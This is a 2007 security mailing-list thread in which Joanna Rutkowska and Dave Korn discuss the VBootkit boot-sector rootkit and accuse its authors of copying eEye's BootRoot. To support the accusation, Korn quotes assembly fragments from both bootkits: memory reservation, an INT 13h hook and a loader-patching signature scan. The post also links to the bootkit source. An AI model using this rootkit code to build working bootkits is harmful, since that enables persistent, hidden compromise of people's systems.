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Re: Nitin Kumar & Vipin Kumar: "please remember to give necessary credit to the authors" PKB.

From: Joanna Rutkowska <joanna () invisiblethings org>
Date: Thu, 26 Apr 2007 23:29:00 +0200

Hash: SHA1

Another thing which should be made clear here is that it's simply unfair
IMHO to present such an attack as if it demonstrated some kind of
security problem in Vista. Please note that Vista *does* make use of the
TPM module via BitLocker to ensure the secure boot process and the
purpose of this is just to prevent such attacks. We just need to have
this TPM module installed on our motherboard.

If I'm mistaken and if this attack worked indeed on Vista with
Bitlocker/TPM enabled, then it would be a *very* nice piece of work! But
it clearly seems it does not...

So, it seems to me like somebody is pointing out a problem which has
already been addressed by Microsoft (via Bitlocker).

Personally I prefer attacks which allow one to get into kernel on the
fly, without reboot ;) Still, however, I must say I very much enjoyed
the work by Derek Soeder and also later by John Heasman -- please note
however that they did not present it as "kernel compromising attacks",
but rather as "persistence technology for malware"...


Dave Korn wrote:

  Well, I see at Security Focus


that some guys called Nitin and Vipin Kumar are claiming to have written a
boot-sector rootkit called "VBootkit".  There's a three page interview with
them, and the source is available from their website: the links are

Front door: http://www.nvlabs.in/.  

Article: "BOOT KIT: Custom boot sector based Windows 2000/XP/2003 Subversion"

Code download page: http://www.nvlabs.in/?q=node/14
Code URLs: http://www.nvlabs.in/files/bootkitbasic_0.zip

  Now, sometimes I feel like I'm the only person on teh internets that can
actually remember more than ten minutes ago in the past, but maybe it's only
journalists.  Still, the moment I saw the hyperbolic headline, "0wning Vista
from the boot", I wondered what was so special about this that wasn't already
demonstrated by Derek and Ryan from eEye two years ago.

  So, I downloaded their code.  God, it sucks.  I was very disappointed by the
lack of any serious amount of comments; it's not easy to read.  But, I could
see easily they were using the same trick of hooking int 13h to stay resident
that eEye demonstrated.

  Suddenly, this comment jumped out at me:

db 90h  ; to get alignment, i suppose

  Huh?  They suppose?  Don't they even know why they did it?

  Then I saw the line after next:

dword_E5:     dd 0      ;something extra

  That's not the kind of label someone writes in their code, and it's not the
kind of comment that someone writes.  That's an IDA auto-generated label.  By
now, I was getting seriously suspicious.  So, for comparison, here's the start
of the code from eEye's BootRoot:


      xor             bx, bx
      mov             ss, bx

      mov             ss:[BOOTORG - 2], sp
      mov             sp, (BOOTORG - 2)

      push            ds

      mov             ds, bx

      ; Reserve 1KB conventional memory for our memory-resident code

      dec             word ptr ds:[0413h]                     ; 0040h:0013h
- base memory size in KBs

      mov             ax, ds:[0413h]
      shl             ax, (10-4)                              ; AX *= 1024 /
16 (convert linear address in KBs to a segment)
      mov             es, ax

      ; Copy ourselves to reserved memory and initialize the rest to zeroes


      mov             si, BOOTORG
      xor             di, di
      mov             cx, BOOTROOT_SIZE / 2
      rep movsw

      xor             ax, ax
      mov             ch, (1024 - BOOTROOT_SIZE) / 2 / 100h
      rep stosw

      ; Install our INT 13h hook

      mov             eax, ds:[bx + (13h*4)]
      mov             es:[INT13HANDLER - @BRCODE16_START], eax        ;
store previous handler

      mov             word ptr [bx + (13h*4)], @Int13Hook     ; point INT
13h vector to our hook handler
      mov             [bx + (13h*4) + 2], es                  ; (BX = 0 from

      ; Load and execute MBR from first hard drive (do this from resident

      push            es
      push            @BootFromHDD

... and here's the start of their code:

        xor bx,bx
        mov ss,bx
      mov [ss:0x7bfe],sp
              mov sp,0x7bfe               
        push ds
        mov ds,bx
              mov ax,[0x413]
        sub ax,2
        mov [0x413],ax
        shl ax,0x6
        mov ax,CODEBASEIN1MB
        mov es,ax
        mov [0x7c00 + codereloc],ax
        mov si,0x7c00
        xor di,di
              mov cx,0x400        ;number of bytes 2 copy to new location this is in
words currently 2 kbs are loaded
        rep movsw
              mov ax,0x201
        mov cl,0x2
      mov eax,[0x4c]
      mov [es:INT13INTERRUPTVALUE],eax
      mov word [0x4c], newint13handler
      mov [0x4e],es
        push es
              push word newmemorycodestart

  Apart from changing "dec word ptr ds:[0413h]" into a load-subtract-store
sequence, because they wanted to reserve 2kB instead of one, and apart from
changing the amount of memory copied to 2kB, and replacing the sequence

      xor             ax, ax
      mov             ch, (1024 - BOOTROOT_SIZE) / 2 / 100h
      rep stosw

that pads to the top of memory with zeros by the meaningless (since eax is
immediately overwritten anyway) sequence[*]:

              mov ax,0x201
        mov cl,0x2

it's identical.  Or take a look at the signature of bytes they search for to
overwrite in the int13 hook: eEye

                                                              ; 8B F0
                                                              ; 85 F6
                                                              ; 74 21
JZ $+23h
                                                              ; 80 3D ...
CMP BYTE PTR [ofs32], imm8
                                                              ; (the first 6
bytes of this signature exist in other modules!)
      repne scasb
      jne             short @Int13Hook_scan_done

      cmp             dword ptr es:[di], 74F685F0h
      jne             short @Int13Hook_scan_loop

      cmp             word ptr es:[di+4], 8021h
      jne             short @Int13Hook_scan_loop

      mov             word ptr es:[di-1], 15FFh               ;
FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32]

and now Vbootkit:

        repne scasb
        jnz scandone
        cmp dword [es:di],0x74f685f0     ;these are signature bytes
        jnz scanloop
        cmp word [es:di+0x4],0x8021 
        jnz scanloop
        mov word [es:di-0x1],0x15ff

  I've seen enough.  It's transparently obvious that these self-publicising
clowns have used IDA to disassemble BootRoot (Guys!  Didn't you know it comes
with source?  How dumb are you?), and have crudely hacked out the very very
clever ndis-patching backdoor payload written by Derek and Ryan and replaced
it with their own crappy amateurish functionality.

  Just to really put the icing on the cake, and then put the cherry on the
icing, these code-stealing tossers placed the following pitiable request at
the top of their assembler source:

;If you develop anything using this code, please remember to give necessary
credit to the authors

  Nitin?  Vipin?  I agree; we all should remember to give necessary credit to
the authors: Derek Soeder and Ryan Permeh, whose innovative hard work deserves
praise.  How come you guys forgot to, huh?


[*] Footnote: I haven't looked at the opcodes for these two sequences, but
what's the betting they're mostly the same bytes, and these guys have somehow
managed to get a framing error when IDAing it?


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